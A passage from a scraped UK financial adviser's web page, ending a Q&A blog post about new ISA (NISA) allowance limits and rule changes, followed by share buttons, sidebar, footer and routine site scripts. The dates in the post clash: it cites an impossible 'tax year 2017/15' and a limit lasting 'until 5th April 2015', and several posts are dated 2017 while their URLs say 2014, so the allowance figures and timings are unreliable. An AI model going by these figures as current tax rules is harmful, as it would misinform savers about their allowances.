limit for the tax year 2017/15 would be £11,880 but – from July 1st – it will increase to £15,000 and that figure will apply until 5th April 2015, by which time we’ll have had the 2015 Budget speech.\r\n\r\n&nbsp;\r\n\r\nBut I’ve already contributed my £11,880 for this year…\r\n\r\n&nbsp;\r\n\r\nNo problem. From July 1st you’ll be able to contribute an additional £3,120 to bring you up to £15,000. If you have contributed £5,940 into a cash ISA, then you’ll be able to contribute an additional £9,060 from July 1st.\r\n\r\n&nbsp;\r\n\r\nSo a husband and wife can save £30,000 a year in ISAs – or NISAs as we have to call them now?\r\n\r\n&nbsp;\r\n\r\nYes.\r\n\r\n&nbsp;\r\n\r\nWill there still be a limit on what I can put into a cash ISA?\r\n\r\n&nbsp;\r\n\r\nIt used to be the case that up to 50% of the annual allowance could go into a cash ISA but from July 1st that limit disappears. So the only limit will be the overall annual limit.\r\n\r\n&nbsp;\r\n\r\nCan I move my money from stocks and shares ISAs to cash as I get older/more cautious?\r\n\r\n&nbsp;\r\n\r\nYes you can. This is another change that will be welcomed by our clients – previously you couldn’t do this, but from July 1st you will be able to.\r\n\r\n&nbsp;\r\n\r\nWhat about Junior ISAs?\r\n\r\n&nbsp;\r\n\r\nThere’s good news here as well. The limit for Junior ISAs is increasing to £4,000 a year – and remember that if you are aged between 16 and 18 you can hold a cash ISA, but not a stocks and shares ISA.\r\n\r\n&nbsp;\r\n\r\nThis means someone between 16 and 18 can pay the full £15,000 into a cash ISA.\r\n\r\n&nbsp;\r\n\r\nSo all in all this is good news and NISAs will now be much more flexible?\r\n\r\n&nbsp;\r\n\r\nAbsolutely. We think these changes are really good news and we’d expect NISAs to play a significant part in the financial planning of a lot of our clients. Interestingly though, there’ll probably be a need for more financial planning, not less. If say, a husband and wife have £30,000 in cash ISAs – as opposed to £11,880 under the old rules – then it’s going to be even more important that they’re receiving the very best interest rate on that money.\r\n\r\n&nbsp;\r\n\r\nSimilarly if you have £15,000 in a stocks and shares ISA – and potentially a lot more as the investments build up over the years – the performance of your fund manager(s) becomes ever more important. So the changes to the ISA rules will probably mean working more closely with your financial advisers.\r\n\r\n&nbsp;\r\n\r\nAnything else?\r\n\r\n&nbsp;\r\n\r\nOnly that we’ll be encouraging our clients to use these new allowances: as we’ve always stressed, it makes sense to make use of all the tax free allowances that are available to you.\r\n\r\n&nbsp;\r\n\r\nIf you have any other questions on the changes to ISAs – or if you’d like any help on working out exactly what you can contribute in the current tax year – then as always don’t hesitate to contact us. We’re only a phone call or an e-mail away.\r\n\r\n&nbsp;\r\n\r\nWarmest regards\r\n\r\n&nbsp;\r\n\r\nSam\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">THE VALUE OF INVESTMENTS AND INCOME FROM THEM AND MAY GO DOWN. YOU MAY NOT GET BACK THE ORIGINAL AMOUNT INVESTED</p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">\r\nBy <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on The New Individual Savings Accounts\" href=\"../new-individual-savings-accounts/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\">\r\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;p[title]=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\">\r\n<a href=\"http://twitter.com/home?status=The+New+Individual+Savings+Accounts%20http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" target=\"_blank\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\">\r\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\">\r\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\">\r\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fnew-individual-savings-accounts%2F&amp;name=The+New+Individual+Savings+Accounts&amp;description=We+know+that+a+lot+of+our+clients+like+to+use+ISAs+for+their+savings+and+benefit+from+the+tax+advantages%3A+this+is+likely+to+increase+after+July+1st.+We+therefore+thought+it+might+be+helpful+if+we+answered+all+the+questions+clients+have+been+asking+us+about+the+proposed+changes\" target=\"_blank\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\">\r\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" target=\"_blank\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\">\r\n<a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\">\r\n<a href=\"mailto:?subject=The New Individual Savings Accounts&amp;body=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../new-individual-savings-accounts/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\">\r\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8425\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"62bc530ba8\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"97\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"float: right;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big>\r\n\r\nsubscribers who get new content from us on a monthly basis</center>\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\r\n<div class=\"heading\">\r\n<p>New Guides</p>\r\n</div>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\r\n<div class=\"tab-holder\"><p>&#13;\r\n			</p>\r\n<div class=\"tab-hold tabs-wrapper\"><p>&#13;\r\n				</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>&#13;\r\n															</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>&#13;\r\n														</ul>\r\n<div class=\"tab-box tabs-container\"><p>&#13;\r\n										</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n															</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../new-individual-savings-accounts/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										May 14th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../get-auto-enrolment/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										May 12th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										May 7th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										April 7th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										April 2nd, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n														</div>\r\n<p>&#13;\r\n			</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"categories-3\" class=\"widget widget_categories\">\r\n<div class=\"heading\">\r\n<p>Post Categories</p>\r\n</div>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\">\r\n<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\">\r\n<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n	</div>\r\n<p>&#13;\r\n				</p>\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"><p>&#13;\r\n			</p>\r\n<section class=\"columns columns-4\">\r\n<article class=\"col\">\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\r\n<p>Our Latest Posts</p>\r\n<ul>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n				</ul>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div id=\"text-13\" class=\"footer-widget-col widget_text\">\r\n<p>Equity SMART</p>\r\n<div class=\"textwidget\">\r\n<p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>\r\n<p>&#13;\r\n</div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div id=\"text-22\" class=\"footer-widget-col widget_text\">\r\n<p>Download FREE Guides</p>\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col last\">\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\r\n<p>Contact Info</p>\r\n<div class=\"contact-info-container\"><p>&#13;\r\n				</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n<div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\">\r\n<p>Connect With Us</p>\r\n<ul class=\"social-networks clearfix\">\r\n<li class=\"rss\">&#13;\r\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\r\n<br />\r\n<div class=\"popup\"><p>&#13;\r\n					</p>\r\n<div class=\"holder\"><p>&#13;\r\n						</p>\r\n<p>RSS</p>\r\n<p>&#13;\r\n					</div>\r\n<p>&#13;\r\n				</div>\r\n<p>&#13;\r\n			</li>\r\n<p>&#13;\r\n												</p>\r\n<li class=\"twitter\">&#13;\r\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\r\n<br />\r\n<div class=\"popup\"><p>&#13;\r\n					</p>\r\n<div class=\"holder\"><p>&#13;\r\n						</p>\r\n<p>Twitter</p>\r\n<p>&#13;\r\n					</div>\r\n<p>&#13;\r\n				</div>\r\n<p>&#13;\r\n			</li>\r\n<p>&#13;\r\n																																																								</ul>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n</section>\r\n</div>\r\n<p>&#13;\r\n	</footer>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping 